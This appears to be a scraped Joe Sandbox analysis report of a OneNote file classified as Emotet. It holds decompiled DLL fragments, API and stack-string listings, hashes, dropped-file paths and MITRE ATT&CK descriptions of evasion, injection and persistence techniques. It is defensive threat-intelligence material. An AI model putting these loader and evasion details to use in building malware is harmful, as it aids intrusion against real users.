				if (0 == 0) goto 0x8000dd79;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
				if (0 + _a24 < 0) goto 0x8000dd46;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x8000dcbd;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
			}

0x18000dc50
0x18000dc55
0x18000dc67
0x18000dc6f
0x18000dc79
0x18000dc8a
0x18000dc98
0x18000dc9c
0x18000dcb4
0x18000dcba
0x18000dcbd
0x18000dcc3
0x18000dccb
0x18000dccd
0x18000dcd8
0x18000dcdf
0x18000dce2
0x18000dce6
0x18000dcf8
0x18000dcfa
0x18000dd05
0x18000dd13
0x18000dd26
0x18000dd2b
0x18000dd35
0x18000dd3e
0x18000dd44
0x18000dd46
0x18000dd5b
0x18000dd64
0x18000dd6f
0x18000dd77
0x18000dd7e
0x18000dd84
0x18000dd8f
0x18000ddbf

APIs

WriteFile.KERNEL32 ref: 000000018000DD67
GetLastError.KERNEL32 ref: 000000018000DD89

Strings

U, xrefs: 000000018000DD13

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 0000000180004AA4
RaiseException.KERNEL32 ref: 0000000180004AEA

Strings

csm, xrefs: 0000000180004AD7

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800109D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 0000000180010A22
RegisterClassExW.USER32 ref: 0000000180010A59

Strings

P, xrefs: 00000001800109D9

Memory Dump Source

Source File: 0000000C.00000002.327848444.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.327841626.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327892228.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327904812.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.327910954.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P
API String ID: 1693014935-3110715001
Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 5084, Parent PID: 604COMMON

Execution Graph

Execution Coverage:	18%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	42
Total number of Limit Nodes:	4

Executed Functions

Function 01000000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 01000344
VirtualAlloc.KERNELBASE ref: 0100038A
VirtualAlloc.KERNELBASE ref: 010003A4
VirtualProtect.KERNELBASE ref: 0100085C
RtlAddFunctionTable.KERNEL32 ref: 010008E9

Strings

ualP, xrefs: 010000CD
nf, xrefs: 01000127
GetN, xrefs: 01000107
ativ, xrefs: 0100010F
Libr, xrefs: 0100009D
Load, xrefs: 01000095
ualA, xrefs: 010000B5
Flus, xrefs: 010000E4
Slee, xrefs: 01000084
Virt, xrefs: 010000C5
o, xrefs: 0100012E
tion, xrefs: 010000F9
Virt, xrefs: 010000AD
ct, xrefs: 010000DD
aryA, xrefs: 010000A5
hIns, xrefs: 010000EB
temI, xrefs: 0100011F
onTa, xrefs: 01000148
ddFu, xrefs: 0100013A
truc, xrefs: 010000F2
eSys, xrefs: 01000117
lloc, xrefs: 010000BD
rote, xrefs: 010000D5
ncti, xrefs: 01000141
Cach, xrefs: 01000100
RtlA, xrefs: 01000133

Memory Dump Source

Source File: 0000000D.00000002.571373556.0000000001000000.00000040.00001000.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1000000_regsvr32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 394283112-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: 993df127eee7e3feac13d7907a568a4894ce8cc687cf2cbb60f5f6d7d74a01d2
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 63521530618B488BE75ADF18D8857BAB7E1FB44305F14462DE8CBC7295DB34E542CB86

Uniqueness

Uniqueness Score: -1.00%

Function 010440A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE ref: 010441EB

Strings

Ql, xrefs: 0104411D
v[, xrefs: 01044152

Memory Dump Source

Source File: 0000000D.00000002.571771558.0000000001041000.00000020.00001000.00020000.00000000.sdmp, Offset: 01041000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1041000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID: Ql$v[
API String ID: 2039140958-138011117
Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
Instruction ID: d70c330bc4505caefb9e8447bca97b61d995a6b84ca97bfa16b1678154ead8cf
Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
Instruction Fuzzy Hash: 4531397051CB848BD7B8DF18D48579AB7E0FB88315F60895EE88CC7295CF789888CB42

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Insight_Medical_Publishing_4.one

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Emotet

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Malware Analysis System Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\1A820D3C-0F4E-4D92-BB7D-90BF78AE86CD

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000005.bin (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000006.bin (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000A.bin (copy)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000B.bin (copy)

Windows Analysis Report
Insight_Medical_Publishing_4.one

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre